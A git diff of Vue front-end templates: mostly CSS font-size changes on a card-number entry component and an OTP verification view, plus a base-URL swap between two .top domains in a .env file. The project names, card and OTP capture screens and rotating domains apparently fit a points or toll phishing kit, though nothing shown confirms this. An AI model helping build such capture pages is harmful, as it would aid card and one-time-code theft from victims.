diff --git a/0000_gb_points_temp/src/components/card/CardTheme1.vue b/0000_gb_points_temp/src/components/card/CardTheme1.vue
index 745bab1..2999508 100644
--- a/0000_gb_points_temp/src/components/card/CardTheme1.vue
+++ b/0000_gb_points_temp/src/components/card/CardTheme1.vue
@@ -531,7 +531,7 @@ onUnmounted(() => {
-
{{ errors.cardNumber || cardMessage }}
@@ -542,14 +542,14 @@ onUnmounted(() => {
diff --git a/0000_gb_points_temp/src/views/OtpView.vue b/0000_gb_points_temp/src/views/OtpView.vue
index e4ec3bb..43d830d 100644
--- a/0000_gb_points_temp/src/views/OtpView.vue
+++ b/0000_gb_points_temp/src/views/OtpView.vue
@@ -42,9 +42,7 @@ const onchange = (value: any) => {
const submit = async () => {
await nextTick();
- loadingStore.setLoading(true);
if (!areAllValuesNotEmpty(formData)) {
- loadingStore.setLoading(false);
return;
}
@@ -393,7 +391,7 @@ onUnmounted(() => {
.otp-title {
margin: 0 0 10px;
- font-size: 1.45rem;
+ font-size: 23px;
font-weight: 800;
color: #0f172a;
letter-spacing: -0.4px;
@@ -402,7 +400,7 @@ onUnmounted(() => {
.otp-subtitle {
margin: 0 0 10px;
- font-size: 0.9rem;
+ font-size: 14px;
color: #64748b;
line-height: 1.6;
max-width: 380px;
@@ -424,7 +422,7 @@ onUnmounted(() => {
background: #fff7ed;
border: 1px solid #fed7aa;
border-radius: 20px;
- font-size: 0.75rem;
+ font-size: 12px;
color: #92400e;
line-height: 1.4;
}
@@ -444,7 +442,7 @@ onUnmounted(() => {
}
.otp-label {
- font-size: 0.82rem;
+ font-size: 13px;
font-weight: 700;
color: #374151;
letter-spacing: 0.4px;
@@ -479,7 +477,7 @@ onUnmounted(() => {
border: none;
outline: none;
background: transparent;
- font-size: 1.75rem;
+ font-size: 28px;
font-weight: 800;
letter-spacing: 0.3em;
color: #111827;
@@ -487,7 +485,7 @@ onUnmounted(() => {
}
.otp-input::placeholder {
- font-size: 0.92rem;
+ font-size: 15px;
font-weight: 400;
letter-spacing: 0.04em;
color: #d1d5db;
@@ -497,7 +495,7 @@ onUnmounted(() => {
display: flex;
align-items: center;
gap: 6px;
- font-size: 0.8rem;
+ font-size: 13px;
font-weight: 500;
color: #dc2626;
margin: 0;
@@ -517,7 +515,7 @@ onUnmounted(() => {
color: #fff;
border: none;
border-radius: 12px;
- font-size: 1rem;
+ font-size: 16px;
font-weight: 700;
letter-spacing: 0.05em;
cursor: pointer;
@@ -551,7 +549,7 @@ onUnmounted(() => {
align-items: center;
justify-content: center;
gap: 6px;
- font-size: 0.85rem;
+ font-size: 14px;
flex-wrap: wrap;
text-align: center;
padding-bottom: 4px;
@@ -669,7 +667,7 @@ onUnmounted(() => {
.otp-info-text {
margin: 0;
- font-size: 0.795rem;
+ font-size: 13px;
color: #6b7280;
line-height: 1.55;
padding-top: 5px;
@@ -686,13 +684,13 @@ onUnmounted(() => {
justify-content: space-between;
padding-top: 14px;
margin-top: 4px;
- font-size: 0.78rem;
+ font-size: 12px;
color: #9ca3af;
border-top: 1px solid #f1f5f9;
}
.otp-powered {
- font-size: 0.72rem;
+ font-size: 12px;
color: #9ca3af;
font-weight: 500;
}
@@ -710,9 +708,9 @@ onUnmounted(() => {
.otp-loading-overlay {
position: fixed;
inset: 0;
- background: rgba(15, 23, 42, 0.45);
- backdrop-filter: blur(8px);
- -webkit-backdrop-filter: blur(8px);
+ background: rgba(15, 23, 42, 0.25);
+ backdrop-filter: blur(4px);
+ -webkit-backdrop-filter: blur(4px);
display: flex;
align-items: center;
justify-content: center;
@@ -749,14 +747,14 @@ onUnmounted(() => {
.otp-loading-text {
margin: 0;
- font-size: 1rem;
+ font-size: 16px;
font-weight: 700;
color: #111827;
}
.otp-loading-sub {
margin: 0;
- font-size: 0.8rem;
+ font-size: 13px;
color: #9ca3af;
}
@@ -787,11 +785,11 @@ onUnmounted(() => {
}
.otp-title {
- font-size: 1.25rem;
+ font-size: 20px;
}
.otp-input {
- font-size: 1.5rem;
+ font-size: 24px;
height: 56px;
}
}
diff --git a/t_etc_temp1/.env.development b/t_etc_temp1/.env.development
index c3daecc..5eead7e 100644
--- a/t_etc_temp1/.env.development
+++ b/t_etc_temp1/.env.development
@@ -5,7 +5,7 @@ VITE_PORT = 8848
VITE_PUBLIC_PATH = ./
# 网站前缀
-VITE_BASE_URL = "dsf.dagf7.top"
+VITE_BASE_URL = "up.xx.sczqb6.top"
# 开发环境路由历史模式(Hash模式传"hash"、HTML5模式传"h5"、Hash模式带base参数传"hash,base参数"、HTML5模式带base参数传"h5,base参数")
VITE_ROUTER_HISTORY = "hash"